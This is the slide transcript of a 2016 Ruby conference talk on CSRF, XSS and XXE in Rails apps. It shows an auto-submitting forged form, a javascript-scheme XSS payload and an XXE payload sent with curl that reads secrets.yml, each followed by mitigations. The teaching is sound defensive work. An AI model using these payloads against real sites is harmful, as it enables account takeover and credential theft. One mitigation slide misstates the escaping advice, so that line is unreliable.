Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security is Broken: Understanding Common Vulnerabilities

Eileen M. Uchitelle
March 21, 2016
Technology
1
160

Security is Broken: Understanding Common Vulnerabilities

Mountain West Ruby Conference

Eileen M. Uchitelle

March 21, 2016
Tweet

More Decks by Eileen M. Uchitelle

See All by Eileen M. Uchitelle
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
1
1.3k
[Brighton Ruby 2023] The Magic of Rails
eileencodes
4
760
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
9
8.3k
Exit(ing) through the YJIT
eileencodes
1
470
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
29
6k
Improving CVAR Performance in Ruby 3.1
eileencodes
0
740
Upgrading GitHub from Ruby 2.6 to 2.7
eileencodes
1
3.3k
Technically, a talk | Ruby Day 2020
eileencodes
1
190
Technically, a talk | Brighton Ruby 2020
eileencodes
2
150

Other Decks in Technology

See All in Technology
インシデントレスポンスのライフサイクルを廻すポイントってなに / Pinpoints of Incidentresponse Lifecycle for Operation
sakaitakeshi
1
300
Next'24 事例セッションの紹介とクラウド資格を活用したキャリア形成について語りMuscle
yasumuusan
1
350
Databricks:『生成AI World Cup』のご案内
databricksjapan
2
150
日本におけるデータエンジニアリングのこれまでとこれから
foursue
12
2.5k
SREとその組織類型
tatsuo48
8
1.5k
元インフラエンジニアに成る / Human Resources to Human Relations
bobtani
3
820
Hands-on / Kaname Frusawa / Cloud Compare Users Meetup 2024 at University of Tokyo on April 17
paraworld
2
470
AWS を使う上で知っておきたいオンプレミス知識/aws-on-premise-essentials
emiki
1
4.2k
Reducing Cross-Zone Egress at Spotify with Custom gRPC Load Balancing Recap
koh_naga
0
140
マルチアカウント環境への発見的統制の導入
ch1aki
1
1.3k
人間の尊厳、幸福、アクセシビリティ / 第116回「WEB TOUCH MEETING」アクセシビリティSP
nulabinc
PRO
2
180
反実仮想機械学習とは何か
usaito
PRO
7
2.4k

Featured

See All Featured
Documentation Writing (for coders)
carmenintech
59
3.9k
Typedesign – Prime Four
hannesfritz
36
2.1k
Ruby is Unlike a Banana
tanoku
96
10k
Agile that works and the tools we love
rasmusluckow
324
20k
The MySQL Ecosystem @ GitHub 2015
samlambert
242
12k
Reflections from 52 weeks, 52 projects
jeffersonlam
344
19k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
115
18k
It's Worth the Effort
3n
180
27k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
24
2.3k
Principles of Awesome APIs and How to Build Them.
keavy
120
16k
Thoughts on Productivity
jonyablonski
57
3.8k
Building Better People: How to give real-time feedback that sticks.
wjessup
354
18k

Transcript

  1. SECURITY IS BROKEN Understanding Common Vulnerabilities

  2. EILEEN M UCHITELLE Security, Performance, & Infrastructure at Basecamp !

    eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes
  3. None
  4. None

  5. OPEN SOURCE Rails Committers Rails Security

  6. None
  7. None

  8. How is security broken?

  9. • Impossible to test for all possible vulnerabilities How is

    security broken?

  10. • Impossible to test for all possible vulnerabilities • Hackers

    are always one step ahead How is security broken?

  11. • Impossible to test for all possible vulnerabilities • Hackers

    are always one step ahead • Patching one vulnerability can lead to exposing new ones How is security broken?

  12. How did we get here?

  13. • Failed to enforce web standards How did we get

    here?

  14. vs.

  15. None

  16. • Failed to enforce web standards • Failed to implement

    a definition of security How did we get here?

  17. ...completely failed to come up with even the most rudimentary

    usable frameworks for understanding the security of modern software. – Michal Zalewski, The Tangled Web

  18. • Failed to enforce web standards • Failed to implement

    a definition of security • Too few people understand the vulnerabilities How did we get here?
  19. None

  20. CSRF

  21. CSRF Cross-Site Request Forgery

  22. EXPLOITING CSRF

  23. None

  24. <form class="edit_user" action="/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Eileen" name="user[name]"

    /> <label for="user_email">Email</label> <input type="text" value="[email protected]" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form>
  25. None

  26. Looks the same, different URL

  27. <body onload=“document.forms[0].submit()"> <form action="http://victimsite.com/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Eileen"

    name=“user[name]" /> <label for="user_email">Email</label> <input type="text" value="[email protected]" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> </body>

  28. <form action="/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Eileen" name=“user[name]" />

    <label for="user_email">Email</label> <input type="text" value="[email protected]" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> Attackers email

  29. <body onload=“document.forms[0].submit()"> <form action="http://victimsite.com/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Eileen"

    name="user[name]" /> <label for="user_email">Email</label> <input type="text" value="[email protected]" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> </body> Auto-submit form

  30. <body onload=“document.forms[0].submit()"> <form action="http://victimsite.com/users/2" method="post"> <label for="user_name">Name</label> <input type="text" value="Eileen"

    name="user[name]" /> <label for="user_email">Email</label> <input type="text" value="[email protected]" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> </body> Auto-submit form to victim site

  31. Attacker’s email

  32. How dangerous are CSRF attacks?

  33. How to mitigate CSRF?

  34. • Use built-in framework CSRF protection How to mitigate CSRF?

  35. None

  36. class ApplicationController < ActionController::Base protect_from_forgery with: :exception end

  37. <form action="/users/2" method="post"> <input type="hidden" value="31RRdFdpulXYDxsOjyTRqKPiJxcP3+ayC==" name=authenticity_token" /> <label for="user_name">Name</label>

    <input type="text" value="Eileen" name="user[name]" /> <label for="user_email">Email</label> <input type="text" value="[email protected]" name="user[email]" /> <label for="user_website">Website</label> <input type="text" value="eileencodes.com" name="user[website]" /> <input type="submit" name="commit" value="Update user" /> </form> CSRF protection

  38. Caveat: CSRF protection in Rails is order-dependent

  39. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end

  40. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end class OtherController < ApplicationController skip_before_action :authenticate before_action :authenticate_method, only: :create end

  41. class ApplicationController < ActionController::Base before_action :authenticate protect_from_forgery with: :exception, if:

    -> { authenticate_method.web? } end class OtherController < ActionController::Base skip_before_action :authenticate before_action :authenticate_method, only: :create protect_from_forgery with: :exception, if: -> { authenticate_method.web? } end
  42. None

  43. • Use built-in framework CSRF protection • Rails 5 supports

    per-form tokens How to mitigate CSRF?

  44. • Use built-in framework CSRF protection • Rails 5 supports

    per-form tokens • Refresh tokens with the session / don’t reuse tokens How to mitigate CSRF?

  45. class SessionsController < ApplicationController def destroy sign_out reset_session redirect_to sign_in_url

    end end Refreshes Authenticity Token

  46. • Use built-in framework CSRF protection • Rails 5 supports

    per-form tokens • Refresh tokens with the session / don’t reuse tokens • Mitigate XSS attacks How to mitigate CSRF?

  47. XSS

  48. XSS Cross-Site Scripting

  49. EXPLOITING STORED XSS

  50. None
  51. None

  52. Escaped HTML

  53. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= @user.name %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

  54. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= (@user.name).html_safe %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %>

  55. Unescaped HTML

  56. JavaScript Scheme

  57. None

  58. javascript://example.com/%0Aalert(1)

  59. example.com/%0Aalert(1) JavaScript Scheme javascript://

  60. javascript://example.com/%0Aalert(1) URL example.com

  61. Percent encoded “line feed” javascript://example.com/%0Aalert(1) %0A

  62. JavaScript Alert javascript://example.com/%0Aalert(1) alert(1)

  63. How dangerous are XSS attacks?

  64. How to mitigate XSS?

  65. • Always escape user-provided data How to mitigate XSS?

  66. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= (@user.name).html_safe %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Don’t do this
  67. None

  68. • Don’t HTML escape user-provided data • Sanitize user-provided data

    How to mitigate XSS?

  69. <h1>Profile</h1> <p id="notice"><%= notice %></p> <p> <strong>Name:</strong> <%= sanitize(@user.name) %>

    </p> <p> <strong>Email:</strong> <%= @user.email %> </p> <p> <strong>Website:</strong> <%= link_to('website', @user.website) %> </p> <%= link_to 'Edit', edit_user_path(@user) %> | <%= link_to 'Back', users_path %> Will strip out unwanted tags and attributes

  70. • Don’t HTML escape user-provided data • Sanitize user-provided data

    • Validate user-provided data How to mitigate XSS?

  71. class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https )

    validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

  72. class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https )

    validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

  73. class User < ActiveRecord::Base WHITELISTED_URI_SCHEMES = %w( http https )

    validate :check_uri_scheme private def check_uri_scheme begin uri = URI.parse(website) unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase) errors.add :website, 'is not an allowed URI scheme' end rescue URI::InvalidURIError errors .add :website, 'is not a valid URI' end end end

  74. XXE

  75. XXE XML eXternal Entity Attack

  76. <!-- todolist.xml --> <!DOCTYPE todolist [ <!ENTITY ext1 SYSTEM “list_items_6-7.xml”>

    ]> <list> <todo>Groceries</todo> <todo>Take Arya to the vet</todo> &ext1; <todo>Pick up beer</todo> <todo>Get car oil changed</todo> </list>

  77. <!-- todolist.xml --> <!DOCTYPE todolist [ <!ENTITY ext1 SYSTEM “list_items_6-7.xml”>

    ]> <list> <todo>Groceries</todo> <todo>Take Arya to the vet</todo> &ext1; <todo>Pick up beer</todo> <todo>Get car oil changed</todo> </list> Entity reference

  78. <!-- list_items_6-7.xml --> <todo>Book flight to Salt Lake City</todo> <todo>Finish

    Security is Broken Talk</todo>

  79. <!-- after parsing --> <list> <todo>Groceries</todo> <todo>Take Arya to the

    vet</todo> <todo>Book flight to Salt Lake City</todo> <todo>Finish Security is Broken Talk</todo> <todo>Pick up beer</todo> <todo>Get car oil changed</todo> </list>

  80. EXPLOITING XXE with cURL

  81. class UsersController < ApplicationController def create @user = User.new(user_params) respond_to

    do |format| if @user.save format.html { redirect_to @user } format.xml { render :xml => @user.to_xml } else format.html { render :new } format.xml { render xml: @user.errors.to_xml } end end end end

  82. class UsersController < ApplicationController def create @user = User.new(user_params) respond_to

    do |format| if @user.save format.html { redirect_to @user } format.xml { render :xml => @user.to_xml } else format.html { render :new } format.xml { render xml: @user.errors.to_xml } end end end end XML

  83. <!DOCTYPE doc [ <!ENTITY name SYSTEM "file:///path/security_examples/ config/secrets.yml"> ]> <user>

    <name>&name;</name> </user>

  84. <!DOCTYPE doc [ <!ENTITY name SYSTEM "file:///path/security_examples/ config/secrets.yml"> ]> <user>

    <name>&name;</name> </user> Requested file

  85. <!DOCTYPE doc [ <!ENTITY name SYSTEM "file:///path/security_examples/ config/secrets.yml"> ]> <user>

    <name>&name;</name> </user> Entity

  86. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://vulnerablesite.com/users.xml POST

    request to users create

  87. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://vulnerablesite.com/users.xml Payload

  88. curl -X 'POST' -H 'Content-Type: application/xml' -d @xxe.xml http://vulnerablesite.com/users.xml <user>

    <name> ... production: secret_key_base: 271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5 f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40 00e166a9a5 ... </name> </user> User’s Name
  89. None

  90. How dangerous are XXE attacks?

  91. None

  92. How to mitigate XXE?

  93. • Don’t parse XML How to mitigate XXE?

  94. Don’t parse XML

  95. • Don’t parse XML • Don’t use parsers that allow

    entity replacement (LibXML) How to mitigate XXE?

  96. >> LibXML::XML.default_substitute_entities >> true

  97. • Don’t parse XML • Don’t use parsers that allow

    entity replacement (LibXML) • Whitelist known entities How to mitigate XXE?

  98. Investigate vulnerabilities & patches SECURITY

  99. owasp.org

  100. Resilience & empowerment SECURITY

  101. None

  102. GitHub
 eileencodes/security_examples

  103. Awareness of vulnerabilities SECURITY

  104. None

  105. To the future

  106. EILEEN M UCHITELLE Security, Performance, & Infrastructure at Basecamp !

    eileencodes.com " @eileencodes # @eileencodes ! speakerdeck.com/eileencodes